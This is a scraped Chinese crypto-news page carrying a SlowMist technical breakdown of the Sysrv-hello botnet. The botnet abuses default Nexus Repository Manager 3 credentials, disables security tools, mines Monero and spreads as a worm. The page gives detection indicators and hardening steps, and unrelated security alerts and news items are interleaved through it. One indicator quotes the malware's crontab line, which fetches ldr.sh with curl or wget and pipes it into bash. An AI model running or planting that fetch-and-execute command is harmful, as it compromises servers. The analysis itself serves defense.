宇宙链 宇宙链
Ctrl+D收藏宇宙链

慢雾:技术拆解 Sysrv-hello 僵尸网络入侵原理

作者:

时间:1900/1/1 0:00:00

攻击路径

Sysrv-hello僵尸网络对云上NexusRepositoryManager3存在默认帐号密码的服务器进行攻击,Maven私服部署会用到NexusRepositoryManager3,由于Maven是个流行服务,所以也给了Sysrv-hello僵尸网络的大范围感染机会。

当NexusRepositoryManager3服务对外网开放且存在默认账号密码时,Sysrv-hello就可以直接扫描入侵,利用NexusRepositoryManager3的Tasks功能模块直接运行恶意脚本达到入侵服务器的目的。

慢雾:针对macOS系统恶意软件RustBucket窃取系统信息:金色财经报道,SlowMist发布安全警报,针对macOS 运行系统的 Rust 和 Objective-C 编写的恶意软件RustBucket,感染链由一个 macOS 安装程序组成,该安装程序安装了一个带后门但功能正常的 PDF 阅读器。然后伪造的 PDF 阅读器需要打开一个特定的 PDF 文件,该文件作为触发恶意活动的密钥。[2023/5/23 15:20:27]

入侵到服务器后会自动下载执行ldr.sh文件,该文件主要功能:1.禁用Linux服务器防火墙(ufw)及清空iptables2.删除aliyun、yunjing等主机安全软件3.禁用apparmor、selinux、watchdog等安全机制4.删除其他竞品5.下载门罗币挖矿程序进行挖矿,文件与进程名为network016.下载第二个木马sysrv进行更高级操作7.在crontab里加上尾巴

慢雾:近期出现假冒UniSat的钓鱼网站,请勿交互:5月13日消息,慢雾首席信息安全官 @IM_23pds 在社交媒体上发文表示,近期有假冒比特币铭文钱包及交易市场平台 UniSat 的钓鱼网站出现,经慢雾分析,假网站有明显的传统针对 ETH、NFT 钓鱼团伙的作案特征,或因近期 BRC-20 领域火热故转而制作有关该领域的钓鱼网站,请用户注意风险,谨慎辨别。[2023/5/13 15:01:11]

第二个木马sysrv的主要功能:1.确保门罗币挖矿程序network01正常运行2.进行蠕虫传播,随机扫描其他IP服务,同样进行NexusRepositoryManager3漏洞利用,同时也会尝试入侵MySQL、Tomcat、WebLogic等服务

慢雾:警惕 Terra 链上项目被恶意广告投放钓鱼风险:据慢雾区情报,近期 Terra 链上部分用户的资产被恶意转出。慢雾安全团队发现从 4 月 12 日开始至 4 月 21 日约有 52 个地址中的资金被恶意转出至 terra1fz57nt6t3nnxel6q77wsmxxdesn7rgy0h27x30 中,当前总损失约 431 万美金。

经过慢雾安全追踪分析确认,此次攻击为批量谷歌关键词广告投放钓鱼,用户在谷歌搜索如:astroport,nexus protocol,anchor protocol 等这些知名的 Terra 项目,谷歌结果页第一条看似正常的广告链接(显示的域名甚至是一样的)实为钓鱼网站。 一旦用户不注意访问此钓鱼网站,点击连接钱包时,钓鱼网站会提醒直接输入助记词,一旦用户输入并点击提交,资产将会被攻击者盗取。

慢雾安全团队建议 Terra 链上用户保持警惕不要随便点击谷歌搜索出来的链接或点击来历不明的链接,减少使用常用钱包进行非必要的操作,避免不必要的资损。[2022/4/21 14:37:55]

自查方法

进程:network01sysrv

文件:/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab:echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口:52013

存在以上这些,停止备份样本后删除。

加固建议

删除NexusRepositoryManager3Tasks里的恶意代码NexusRepositoryManager3严禁外网访问,严禁默认账号密码NexusRepositoryManager3升级为最新版本被入侵服务器备份重要数据后,重配置或重做检查被入侵服务器是否存在直接访问生产网其他服务的能力,存在则在生产网其他服务所在的服务器上进一步分析是否有异常免责声明:作为区块链信息平台,本站所发布文章仅代表作者个人观点,与链闻ChainNews立场无关。文章内的信息、意见等均仅供参考,并非作为或被视为实际投资建议。

本文来源于非小号媒体平台:

慢雾科技

现已在非小号资讯平台发布68篇作品,

非小号开放平台欢迎币圈作者入驻

入驻指南:

/apply_guide/

本文网址:

/news/9606255.html

免责声明:

1.资讯内容不构成投资建议,投资者应独立决策并自行承担风险

2.本文版权归属原作所有,仅代表作者本人观点,不代表非小号的观点或立场

上一篇:

深入解析MakeDao在新周期里的机遇和风险

标签:NexusNEXMANATORNexus Mutualnexo币挖矿教程MANA币dAppstore

币赢交易所热门资讯
加密投行 Galaxy Digital 计划于 2 月中旬启动以太坊基金

加密资产领域投资银行GalaxyDigital在给用户的邮件中指出,计划于2月中旬正式启动以太坊基金GalaxyEthereumFund,这一种私募基金,旨在提供机构级别的以太坊风险敞口.

1900/1/1 0:00:00
黔南布依族苗族自治州核心要点

出行无需核酸阴性证明,尽量留在当地过春节,避免跨境旅行和前往国内中高风险地区。春节农村返乡人员需持7天内有效新冠病核酸检测阴性结果,返乡后实行14天居家健康监测,期间不聚集、不流动,每7天开展一次核酸检测.

1900/1/1 0:00:00
谈喻凯:1.22比特币以太坊柚子操作建议及多单解套

今日早盘比特币跌破30000美元/枚,为1月5日以来首次,24小时内跌超16%。据比特币平台数据显示,比特币跌破30000美元关口。较1月的最高点42000美元的历史高位已经跌去10000多美元。这已经是比特币价格连跌的第三日.

1900/1/1 0:00:00
币圈小蝶:炒币心态重要性,不好心态只会增加亏损

?在这个多空难测的市场上,有人能赚到钱,但也有很多朋友做的不够理想。在该做空的时候,怕冲高。该做多的时候,怕回落。其实这就是人心,而人心就是最复杂的技术。有时候你会知道,真正影响你的不是价格,而是你心中想的东西太过于多.

1900/1/1 0:00:00
阿坝州核心要点

1.严禁师生出省,原则上不得出州。确要出州的,须经学校、县级教育局批准;师生出州后,每天要上报活动轨迹;禁止参加大型聚餐活动。春季开学前,师生要提前14天返回州内做核酸检测.

1900/1/1 0:00:00
中币(ZB)市场研究员:BTC XMR DASH日内技术分析

比特币价格昨日扩大跌幅15.07%,收盘报30252.56美元。从我们之前的分析中,如果利空趋势持续在未来的日子里,我们提到了比特币的主导地位将进一步降至64.61%的低点。昨日亚洲交易时段早盘开盘时,比特币面临巨大的看空压力.

1900/1/1 0:00:00